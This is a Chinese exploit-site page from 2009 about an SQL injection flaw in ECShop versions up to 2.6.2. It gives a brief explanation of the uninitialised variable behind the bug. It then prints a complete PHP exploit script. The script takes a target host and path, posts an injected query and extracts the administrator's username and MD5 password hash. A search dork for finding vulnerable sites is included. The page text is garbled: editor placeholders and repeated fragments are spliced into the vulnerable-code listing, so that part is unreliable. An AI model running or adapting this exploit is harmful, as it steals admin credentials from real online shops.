首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ECShop <= v2.6.2 SQL injection 0day
来源:www.vfcocus.net 作者:Ryat 发布时间:2009-03-25  

影响2.5.x和2.6.x,其他版本未测试

goods_script.php44行:

  1. if (emptyempty(

    影响2.5.x和2.6.x,其他版本未测试

    goods_script.php44行:

    ___FCKpd___0

     

    $sql没有初始化,很明显的一个漏洞:)

    EXP:

    1. #!/usr/bin/php  
    2. <?php  
    3.  
    4. print_r('  
    5. +---------------------------------------------------------------------------+  
    6. ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit  
    7. by puret_t  
    8. mail: puretot at gmail dot com  
    9. team: http://www.smxiaoqiang.cn  
    10. dork: "Powered by ECShop" 
    11. +---------------------------------------------------------------------------+  
    12. ');  
    13. /**  
    14. * works with register_globals = On  
    15. */ 
    16. if ($argc < 3) {  
    17.     print_r('  
    18. +---------------------------------------------------------------------------+  
    19. Usage: php '.$argv[0].' host path  
    20. host:      target server (ip/hostname)  
    21. path:      path to ecshop  
    22. Example:  
    23. php '.$argv[0].' localhost /ecshop/  
    24. +---------------------------------------------------------------------------+  
    25. ');  
    26.     exit;  
    27. }  
    28.  
    29. error_reporting(7);  
    30. ini_set('max_execution_time', 0);  
    31.  
    32. $host = $argv[1];  
    33. $path = $argv[2];  
    34.  
    35. $resp = send();  
    36. preg_match('#href="([\S]+):([a-z0-9]{32})"#'$resp$hash);  
    37.  
    38. if ($hash)  
    39.     exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");  
    40. else 
    41.     exit("Exploit Failed!\n");  
    42.  
    43. function send()  
    44. {  
    45.     global $host$path;  
    46.  
    47.     $cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';  
    48.  
    49.     $data = "POST ".$path."goods_script.php?type=".time()."  HTTP/1.1";  
    50.     $data .= "Accept: */*";  
    51.     $data .= "Accept-Language: zh-cn";  
    52.     $data .= "Content-Type: application/x-www-form-urlencoded";  
    53.     $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)";  
    54.     $data .= "Host: $host";  
    55.     $data .= "Content-Length: ".strlen($cmd)."";  
    56.     $data .= "Connection: Close";  
    57.     $data .= $cmd;  
    58.  
    59.     $fp = fsockopen($host, 80);  
    60.     fputs($fp$data);  
    61.  
    62.     $resp = '';  
    63.  
    64.     while ($fp && !feof($fp))  
    65.         $resp .= fread($fp, 1024);  
    66.  
    67.     return $resp;  
    68. }  
    69.  
    70. ?> 

     

    GET
    ['type']))  
  2.     {  
  3.         ...  
  4.     }  
  5.     elseif (

    影响2.5.x和2.6.x,其他版本未测试

    goods_script.php44行:

    ___FCKpd___0

     

    $sql没有初始化,很明显的一个漏洞:)

    EXP:

    ___FCKpd___1

     

    GET
    ['type'] == 'collection')  
  6.     {  
  7.         ...  
  8.     }  
  9.     $sql .= " LIMIT " . (!emptyempty(

    影响2.5.x和2.6.x,其他版本未测试

    goods_script.php44行:

    ___FCKpd___0

     

    $sql没有初始化,很明显的一个漏洞:)

    EXP:

    ___FCKpd___1

     

    GET
    ['goods_num']) ? intval(

    影响2.5.x和2.6.x,其他版本未测试

    goods_script.php44行:

    ___FCKpd___0

     

    $sql没有初始化,很明显的一个漏洞:)

    EXP:

    ___FCKpd___1

     

    GET
    ['goods_num']) : 10);  
  10.     $res = $db->query($sql); 

 

$sql没有初始化,很明显的一个漏洞:)

EXP:

___FCKpd___1

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IncrediMail 5.86 (XSS) Script
·Mozilla Firefox XSL Parsing Re
·Femitter FTP Server 1.x Multip
·PHPizabi v0.848b C1 HFP1-3 Rem
·Microsoft GdiPlus.dll EMF GpFo
·Adobe Acrobat Reader JBIG2 Uni
·Free Arcade Script 1.0 Auth By
·PhotoStand 1.2.0 Remote Comman
·Syzygy CMS 0.3 LFI/SQL Command
·XM Easy Personal FTP Server <=
·POP Peeper 3.4.0.0 .html file
·FreeSSHd 1.2.1 (rename) Remote
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved